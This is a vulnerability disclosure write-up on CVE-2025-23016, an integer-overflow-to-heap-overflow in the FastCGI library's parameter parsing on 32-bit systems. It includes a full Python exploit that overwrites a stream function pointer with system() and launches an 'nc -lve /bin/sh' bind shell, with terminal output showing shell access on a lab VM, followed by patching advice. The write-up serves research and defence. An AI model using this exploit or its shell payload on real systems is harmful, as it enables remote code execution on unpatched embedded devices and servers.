CVE-2025-23016 - Exploiting the FastCGI library

Written by Baptiste Mayaud - 23/04/2025 - in Exploit - Download

At the beginning of 2025, as part of our internal research, we discovered a vulnerability in the FastCGI lightweight web server development library.
In this article, we'll take a look at the inner workings of the FastCGI protocol to understand how and in what context this vulnerability can be exploited. Finally, we'll see how to protect against it.

Looking to improve your skills? Discover our trainings sessions! Learn more.

Introduction

FastCGI is a library written in C for developing compiled web applications by designing a way to communicate between a web server like NGINX and third-party software. It is an evolution of the Common Gateway Interface (CGI).

Its main advantage is its ability to integrate lightweight web applications. This feature means that the library is mainly used in equipment with low computing power, such as cameras.

It should be noted that PHP-FPM, the PHP integration of FastCGI, reimplements the FCGI protocol and does not use the FastCGI library.

The FastCGI protocol

A FastCGI-based web server works as follows. An HTTP processing server is listening on the given port, such as Nginx, lighttpd or Apache HTTP Server.
Once the request has been processed, a message is sent to the cgi binary via the FCGI protocol. There are two ways of transporting this message, under TCP socket or UNIX socket. The choice of transport mode is left to the developer. It is communicated to the HTTP server, usually in the form of a configuration file.

The first packet in the FCGI protocol is the FCGI_Header. This indicates the type of request and its size.

typedef struct {
    unsigned char version;
    unsigned char type;
    unsigned char requestIdB1;
    unsigned char requestIdB0;
    unsigned char contentLengthB1;
    unsigned char contentLengthB0;
    unsigned char paddingLength;
    unsigned char reserved;
} FCGI_Header;

In conventional communication, the FCGI_BEGIN_REQUEST is sent first.

This is made up of the FCGI_Header, followed by an additional header, the FCGI_BeginRequestBody.

typedef struct {
    unsigned char roleB1;
    unsigned char roleB0;
    unsigned char flags;
    unsigned char reserved[5];
} FCGI_BeginRequestBody;

This packet is used to initiate the connection, specifying the sender's role as well as flags such as whether or not to leave the connection open at the end of the packet.

The only thing to note here is that, without a role, any incoming packet is considered invalid and therefore destroyed.

Once the role has been defined, the FCGI_Header is followed by a series of parameters. A parameter is made up of four elements. Two sizes, a key and a value. The first size corresponds to the size of the key, the second to the size of the value.

Sizes are either 32-bit or 8-bit, depending on their value. If a size is greater than 0x80, it will be processed on 32 bits. Once a parameter has been read, the protocol will try to interpret the following bytes as a new parameter until the end of the data transport, or until it has reached the size indicated in the FCGI_Header.

These parameters will actually be the data transmitted by the HTTP server. They include keys such as "QUERY_STRING", which correspond to the HTTP request parameter. Using these keys, the developer can access the HTTP request data to develop his web application.

Vulnerability

static int ReadParams(Params *paramsPtr, FCGX_Stream *stream)
{
    int nameLen, valueLen;
    unsigned char lenBuff[3];
    char *nameValue;

    while((nameLen = FCGX_GetChar(stream)) != EOF) {
        /*
         * Read name length (one or four bytes) and value length
         * (one or four bytes) from stream.
         */
        if((nameLen & 0x80) != 0) {
            if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
                SetError(stream, FCGX_PARAMS_ERROR);
                return -1;
            }
            nameLen = ((nameLen & 0x7f) << 24) + (lenBuff[0] << 16)
                    + (lenBuff[1] << 8) + lenBuff[2];
        }
        if((valueLen = FCGX_GetChar(stream)) == EOF) {
            SetError(stream, FCGX_PARAMS_ERROR);
            return -1;
        }
        if((valueLen & 0x80) != 0) {
            if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
                SetError(stream, FCGX_PARAMS_ERROR);
                return -1;
            }
            valueLen = ((valueLen & 0x7f) << 24) + (lenBuff[0] << 16)
                    + (lenBuff[1] << 8) + lenBuff[2];
        }
        /*
         * nameLen and valueLen are now valid; read the name and value
         * from stream and construct a standard environment entry.
         */
        nameValue = (char *)Malloc(nameLen + valueLen + 2);
        if(FCGX_GetStr(nameValue, nameLen, stream) != nameLen) {
            SetError(stream, FCGX_PARAMS_ERROR);
            free(nameValue);
            return -1;
        }
        *(nameValue + nameLen) = '=';
        if(FCGX_GetStr(nameValue + nameLen + 1, valueLen, stream)
                != valueLen) {
            SetError(stream, FCGX_PARAMS_ERROR);
            free(nameValue);
            return -1;
        }
        *(nameValue + nameLen + valueLen + 1) = '\0';
        PutParam(paramsPtr, nameValue);
    }
    return 0;
}

The ReadParams function takes a pointer to FCGX_Stream as parameter, which corresponds to the data stream received by the socket, and fills a pointer to a Params structure.

This function will read the incoming stream until it is exhausted, or until an error occurs in the protocol.

This function will read the first byte; if this is greater than or equal to 0x80, then the size will be read over 4 bytes and not just one.
The next 3 bytes will then be read and consolidated to make a 4-byte integer. A check is performed to ensure that the integer is not greater than INT_MAX. This check is performed to avoid integer overflow, as this size is added to another integer retrieved in the same way.

if((nameLen & 0x80) != 0) {
    if(FCGX_GetStr((char *) &lenBuff[0], 3, stream) != 3) {
        SetError(stream, FCGX_PARAMS_ERROR);
        return -1;
    }
    nameLen = ((nameLen & 0x7f) << 24) + (lenBuff[0] << 16)
            + (lenBuff[1] << 8) + lenBuff[2];
}

So far so good, it's in the call to malloc that the problem arises.

nameValue = (char *)Malloc(nameLen + valueLen + 2);

Probably to store the “=” character between the key and the value in addition to a null byte at the end of the string, a +2 is added to the final allocation calculation.

However, where 0x7ffffffff + 0x7ffffffff + 1 = 0xffffffff...
0x7ffffffff + 0x7ffffffff + 2 = 0.

This equality can only be verified on a 32bit machine. In fact, the result of this calculation will be stored in an integer whose type will not be defined by the nameLen and valueLen types, but by the type of the malloc parameter. Under stdlib, this parameter is a size_t. The definition of a size_t depends on the target machine, but you can think of a size_t as an unsigned long long. This means that on a 64-bit machine, the size (8 bytes) of the parameter will be sufficient to correctly store the maximum result of the calculation. On a 32-bit machine, only 4 bytes will be allocated, creating an integer overflow.

Note that malloc, when allocating a size smaller than 0x10, will allocate 0x10 bytes.

If the two sizes provided are 0xfffffffff, on a 32bit machine, the result will be an allocation of 0x10 for a key/value size known from the binary of 0x7ffffffff. In fact, the mask on the first byte will reduce the value from 0xff to 0x7f.

This integer overflow leads to a more important vulnerability, the one that will actually be exploited in this article: a heap overflow.

Once allocated, the pointer returned by malloc is directly used to accommodate user input.

if(FCGX_GetStr(nameValue, nameLen, stream) != nameLen) {
    //...
}

The FCGX_GetStr function takes a pointer, a size and the FCGX_Stream to read from, then reads as many bytes as requested from the FCGX_Stream into the pointer supplied as the first parameter.

In operational terms, this could pose a problem. Indeed, by giving a size of 0x7ffffffff, writing outside the buffer will reach the end of the heap and generate a crash when writing to an non-mapped area.

However, the FCGX_Stream system allows you to control the size written to the target buffer.

int FCGX_GetStr(char *str, int n, FCGX_Stream *stream)
{
    int m, bytesMoved;

    if (stream->isClosed || ! stream->isReader || n <= 0) {
        return 0;
    }
    /*
     * Fast path: n bytes are already available
     */
    if(n <= (stream->stop - stream->rdNext)) {
        memcpy(str, stream->rdNext, n);
        stream->rdNext += n;
        return n;
    }
    /*
     * General case: stream is closed or buffer fill procedure
     * needs to be called
     */
    bytesMoved = 0;
    for (;;) {
        if(stream->rdNext != stream->stop) {
            m = min(n - bytesMoved, stream->stop - stream->rdNext);
            memcpy(str, stream->rdNext, m);
            bytesMoved += m;
            stream->rdNext += m;
            if(bytesMoved == n)
                return bytesMoved;
            str += m;
        }
        if(stream->isClosed || !stream->isReader)
            return bytesMoved;
        stream->fillBuffProc(stream);
        if (stream->isClosed)
            return bytesMoved;

        stream->stopUnget = stream->rdNext;
    }
}

The FCGX_Stream structure contains a pointer to the next byte to be read, rdNext, and a pointer to the last byte read by the socket, stop.

The FCGX_GetStr function will use this to avoid reading further than has been inserted into the stream. Consequently, if the stream is completed, writing to the target buffer will be terminated.
This stop condition will allow us to control the number of bytes written to the target buffer despite the size passed as a parameter in FCGX_GetStr. We'll need to ensure that the parameter used is the last one in our stream.

In short, an integer overflow in the parameter processing function leads to a buffer overflow in the heap whose size is controlled.

Demonstration environment

A virtual machine on which lighttpd and its FastCGI module have been installed has been set up for demonstration purposes.

The demo web server is a simplistic binary monitoring system data.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <string.h>

#include <fcgi_config.h>
#include <fcgiapp.h>

#define NTSTAT (2)
#define UPTIME (1)

char *exec_cmd(char *command)
{
    int link[2];
    pid_t pid;
    char *res = malloc(4096);

    if (res == NULL)
        return NULL;

    if (pipe(link) == -1)
        return NULL;

    if ((pid = fork()) == -1)
        return NULL;

    if(pid == 0) {
        dup2(link[1], STDOUT_FILENO);
        close(link[0]);
        close(link[1]);
        system(command);
        exit(0);
    }
    else {
        close(link[1]);
        int nbytes = read(link[0], res, 4095);
        res[nbytes] = 0;
        wait(NULL);
    }
    return res;
}

unsigned char readArgs(char *query)
{
    unsigned char ret = 0;
    char *buf = NULL;

    while ((buf = strtok(query, "&")) != NULL) {
        if (!strncmp(buf, "uptime", 6))
            ret |= UPTIME;
        else if (!strncmp(buf, "ntstat", 6))
            ret |= NTSTAT;
        query = NULL;
    }
    return ret;
}

void write_log(const char *log_content) {
    FILE *file = fopen("/tmp/log.txt", "ab");
    if (file == NULL) {
        perror("Error opening file");
        return;
    }
    
    // Écriture de la chaîne
    while (*log_content) {
        fputc(*log_content, file);
        log_content++;
    }
    
    // Écriture du null byte
    fputc('\n', file);
    
    fclose(file);
}

void do_log(FCGX_Request *request)
{
    char *uri = FCGX_GetParam("REQUEST_URI", request->envp);
    char *status = FCGX_GetParam("REDIRECT_STATUS", request->envp);
    char *remote = FCGX_GetParam("REMOTE_ADDR", request->envp);

    if (uri == NULL || status == NULL || status == NULL)
        return;

    size_t total_size = strlen(uri) + strlen(status) + strlen(remote)+ 4;
    char *buf = malloc(total_size + 1);

    if (buf == NULL)
        return;

    snprintf(buf, total_size, "%s: %s:%s", remote, uri, status);
    write_log(buf);
    free(buf);
}

int main ()
{
    FCGX_Request request;

    FCGX_Init();
    FCGX_InitRequest(&request, 0, 0);
    int count = 0;

    while (FCGX_Accept_r(&request) >= 0) {
        char *query = FCGX_GetParam("QUERY_STRING", request.envp);
        char *uptime = exec_cmd("/usr/bin/uptime");
        char *ntstat = exec_cmd("/usr/bin/netstat -lt");
        int len = 0;

        do_log(&request);
        if (uptime == NULL || ntstat == NULL) {
            FCGX_FPrintF(request.out,
                "Content-type: text/html\r\n"
                "\r\n"
                "<title>Monitor server</title>"
                "<h1>Server monitoring</h1>\n"
                "<p>error</p>");
        }
        else {
            FCGX_FPrintF(request.out,
                "Content-type: text/html\r\n"
                "\r\n"
                "<title>Monitor server</title>"
                "<h1>Server monitoring</h1>\n");
            
            unsigned char args = readArgs(query);
            switch (args) {
                case 0:
                    FCGX_FPrintF(request.out,
                        "<p>NULL<p>\n");
                    break;
                case UPTIME:
                    FCGX_FPrintF(request.out,
                        "<p>%s<p>\n", uptime);
                    break;
                case NTSTAT:
                    FCGX_FPrintF(request.out,
                        "<p>%s<p>\n", ntstat);
                    break;
                case NTSTAT | UPTIME:
                    FCGX_FPrintF(request.out,
                        "<p>%s</p>"
                        "<p>%s<p>\n", uptime, ntstat);
                    break;
            }
            free(uptime);
            free(ntstat);
        }
        
        FCGX_Finish_r(&request);

    }

    return 0;
}

 

It was intended to present the vulnerability using a server that would be vulnerable to an SSRF. A controlled request from the web server accesses a port listening on 127.0.0.1, which opens access to the FastCGI socket. When properly configured, this socket only listens locally.

However, when setting up the lighttpd server and looking for documentation on how to configure lighttpd for FastCGI, it was noticed that the first link pushed by Google suggests to the reader to perform a vulnerable lighttpd setup.

In fact, the configuration file proposed as an example exposes the FastCGI socket.

fastcgi.server = (   "/remote_scripts/"
    =>   (( "host" => "192.168.0.3",
            "port" => 9000,
            "check-local" => "disable",
            "docroot" => "/" # remote server may use # its own docroot   )) )

We decided to follow this tutorial.

To summarize, a virtual machine accessible over a LAN provides a web service to report system metrics using FastCGI and lighttpd. The lighttpd configuration is vulnerable by exposing the FastCGI socket.
All system and binary protections are active except PIE.

Exploitation

A vulnerability of this type, on a library and not an application or system, is by its very nature highly dependent on its context of use.
For the purposes of this article, it seemed more appropriate to carry out an exploitation as independent as possible of the binary using the library.
Initially, the idea was to exploit malloc's cache corruption. Further research showed that FastCGI provides all the tools needed to take control of the execution flow. It was therefore not necessary to corrupt the malloc's caches, which means that this exploit is also independent of the version of the C library present on the machine.

The chosen exploitation method is based on the FCGX_Stream structure and its use.
This is represented as follows:

typedef struct FCGX_Stream {
    unsigned char *rdNext;    /* reader: first valid byte
                               * writer: equals stop */
    unsigned char *wrNext;    /* writer: first free byte
                               * reader: equals stop */
    unsigned char *stop;      /* reader: last valid byte + 1
                               * writer: last free byte + 1 */
    unsigned char *stopUnget; /* reader: first byte of current buffer
                               * fragment, for ungetc
                               * writer: undefined */
    int isReader;
    int isClosed;
    int wasFCloseCalled;
    int FCGI_errno;                /* error status */
    void (*fillBuffProc) (struct FCGX_Stream *stream);
    void (*emptyBuffProc) (struct FCGX_Stream *stream, int doClose);
    void *data;
} FCGX_Stream;

It's particularly interesting for three reasons. The first is the presence of pointers to fillBuffProc and emptyBuffProc functions. The ability to rewrite them from the heap would make it possible to take control of the execution flow without having to rewrite a function from the GOT, Global Offset Table, (potentially protected by RelRO, Relaction Read-Only) or malloc/free_hook, which are no longer present since glibc 2.32.

The second reason is that this structure is destroyed and reallocated between each FCGI request. This means that it is potentially possible to have a pointer returned by malloc that precedes this structure, and thus depend only on relative position and not known address to perform the exploit, making ASLR ineffective.

The third and final reason is the way fillBuffProc is called:

stream->fillBuffProc(stream);

A pointer to the FCGX_Stream structure is used, allowing control of at least the first few bytes of the pointer in question.

The exploitation strategy is as follows:

  • Obtain a vulnerable pointer preceding the FCGX_Stream structure.
  • Override the latter's buffer to rewrite the structure, replacing fillBuffProc with the system's PLT entry, and writing “/bin/sh” at the start of the structure.
  • Get a call to fillBuffProc without crashing the binary first.

In this case, there's a call to system in our binary that isn't compiled using PIE, so the address of this function's PLT is known. However, we note that all the web servers tested restart the fastcgi binary in the event of the latter crashing. As this vulnerability can only be exploited in 32-bit mode, it is quite realistic to imagine a brute-force attack on the system's address directly in the libc in a different context.
What's more, since data stream pointers are controlled, it's also possible to obtain a memory leak beforehand. This will depend on the context of the application.

To obtain a vulnerable pointer preceding the FCGX_Stream structure, it is first important to ensure that the latter is always positioned in the same place relative to our allocations. As previously mentioned, it is systematically destroyed and reallocated between each request, making its position on the heap random in two different cycles. The simplest method is to crash the binary once, and base ourselves on the structure's position in the binary's initial state. This way, when the cgi binary is restarted, the structure will be where we expect it to be.

Next, the parameters read in ReadParams will be used to remove, one by one and in the right order, any pointers that have already been destroyed.
Indeed, when calling free, malloc will consider the destroyed zone as usable again, and will store the size of the freed zone as well as its position. This zone can then be redistributed by further calls to malloc, if the desired size is smaller than that of the previously freed zone.

A first curl will be sent to the web server so as to have memory zones allocated and then destroyed, and hope that when the FCGX_Stream structure is reallocated, it will be located after a freed zone.

Once our first web request has been launched, a second request will be issued, checking the previous 0x30 bytes of our structure, located here at address 0x804e6e0.

gef➤  x/32wx 0x0804e6e0-0x30
0x804e6b0:  0x2e383631  0x2e363031  0x00000039  0x00000021
0x804e6c0:  0x0804e708  0xb7fb4778  0x3d54524f  0x35383534
0x804e6d0:  0x00000034  0x00000000  0x000000e0  0x00000030
0x804e6e0:  0x0804c3fa  0x0804c5a0  0x0804c5a0  0x0804c3f8

Note that an area of size 0x20 has indeed been freed. Getting an allocation here will therefore be our goal.

Note, however, that our vulnerable allocation will be 0x10 and not 0x20. So, in reality, we'll need to obtain an allocation at our freed zone + 0x10.

To achieve this, we'll need to “pop” the freed zones until we reach the 0x20 zone, then allocate another 0x10 pointer so that only a 0x10 zone - the one between the last allocated pointer and our structure - remains free for the next call to a malloc of size smaller than 0x10.

By obtaining a contiguous pointer, we avoid overwriting the metadata used by malloc to remember the sizes and memory areas freed by the other pointers. This will avoid crashing the binary before reaching fillBuffProc.

By analyzing the state of the heap at the time of the call to ReadParams, we've determined that, in our context, it will take nine allocations of 0x30 and then two of 0x10 for malloc to provide the pointer preceding our structure when it's asked for a size of 0x10 or less.

In the ReadParams function's parameter reading loop, the corrupted parameter will be preceded by nine valid parameters of size 0x30, and two of size 0x10.

The next step is to exploit the integer overflow to create a buffer overflow and rewrite the FCGX_Stream structure so that fillBuffProc is replaced by the system's PLT, then called with the first bytes of the structure being a valid bash string.

The next potential call to fillBuffProc is made in the FCGX_GetChar function.

int FCGX_GetChar(FCGX_Stream *stream)
{
    if (stream->isClosed || ! stream->isReader)
        return EOF;

    if (stream->rdNext != stream->stop)
        return *stream->rdNext++;

    stream->fillBuffProc(stream);
    if (stream->isClosed)
        return EOF;

    stream->stopUnget = stream->rdNext;
    if (stream->rdNext != stream->stop)
        return *stream->rdNext++;

    ASSERT(stream->isClosed); /* bug in fillBufProc if not */
    return EOF;
}

For fillBuffProc to be called, the isClosed field must be null, isReader must be non-null and rdNext must be equal to stop.

Fortunately, no pointer dereferencing takes place before the corrupted function pointer is called.

The condition isClosed to null will limit the size of our bash string, isReader will have no impact, and the condition rdNext equal to stop will force the first four bytes of our bash string to be equal to the four bytes in twelfth position.
None of these conditions are insuperable, but the size of our bash string will be limited.

The string " /bi;nc -lve /bin/sh" followed by the 4 null bytes will bypass the conditions, and lead the FCGX_GetChar function to call fillBuffProc, which will actually be system taking as parameter a bash string that will launch a shell listening on a random port between 30,000 and 50,000, leading to arbitrary code execution.

In reality, the bash command is no more than 15 characters long in this configuration. However, as mentioned above, HTTP web servers re-run the fcgi binary in the event of a crash. It is therefore possible to replay the exploit several times to write a command to a file using "echo abc > a" and execute it, bypassing the size limit.

The final exploit becomes :

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('./test')

def start(argv=[], *a, **kw):
    return remote("192.168.106.9", 9003)

"""
typedef struct {
    unsigned char version;
    unsigned char type;
    unsigned char requestIdB1;
    unsigned char requestIdB0;
    unsigned char contentLengthB1;
    unsigned char contentLengthB0;
    unsigned char paddingLength;
    unsigned char reserved;
} FCGI_Header;
"""

def makeHeader(type, requestId, contentLength, paddingLength):
    header = p8(1) + p8(type) + p16(requestId) + p16(contentLength)[::-1] + p8(paddingLength) + p8(0)
    return header

"""
typedef struct {
    unsigned char roleB1;
    unsigned char roleB0;
    unsigned char flags;
    unsigned char reserved[5];
} FCGI_BeginRequestBody;
"""

def makeBeginReqBody(role, flags):
    return p16(role)[::-1] + p8(flags) + b"\x00" * 5

io = start()

header = makeHeader(9, 0, 900, 0)

print(hex(exe.plt["system"]))
io.send(makeHeader(1, 1, 8, 0) + makeBeginReqBody(1, 0) + header + (p8(0x13) + p8(0x13) + b"b" * 0x26)*9 + p8(0) * (2 *2)+ p32(0xffffffff) + p32(0xffffffff)  + b"a" * (4 * 4) + b" /bi;nc -lve /bin/sh" +p32(0) * 3 + p32(exe.plt["system"]) )

io.close()

➜  article git:(master) ✗ ./exploit.py
[*] './test'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to 192.168.106.9 on port 9003: Done
0x80490b0
[*] Closed connection to 192.168.106.9 port 9003
➜  article git:(master) ✗ sudo nmap -T4 192.168.106.9 -p30000-50000
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-12 18:46 CET
Nmap scan report for 192.168.106.9
Host is up (0.00024s latency).
Not shown: 20000 closed ports
PORT      STATE SERVICE
39649/tcp open  unknown
MAC Address: 08:00:27:E9:86:0A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
➜  article git:(master) ✗ nc 192.168.106.9 39649
id
uid=1000(osboxes) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)
ls /
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old

Mitigating the issue

The vulnerability was reported as a Github issue. Discussions with the maintainers and a pull request have been carried out to add additional checks and correct the bug.

Updating to version 2.4.5 will protect against the vulnerability. If you are installing the library using packages, make sure that they are synchronised with version 2.4.5 and higher.

We also recommend limiting potential remote access to the FastCGI socket by declaring it as a UNIX socket.

Conclusion

FastCGI, despite a relatively low vulnerability record since its creation in 1996 and frequent use in embedded technologies, is not free from implementation problems.

However, this flaw is easy to correct, and good implementation practices may have enabled some servers to protect themselves before the vulnerability was published.

In the meantime, it may be a good idea to integrate rules ensuring at least the correct configuration of your web server to ensure maximum security.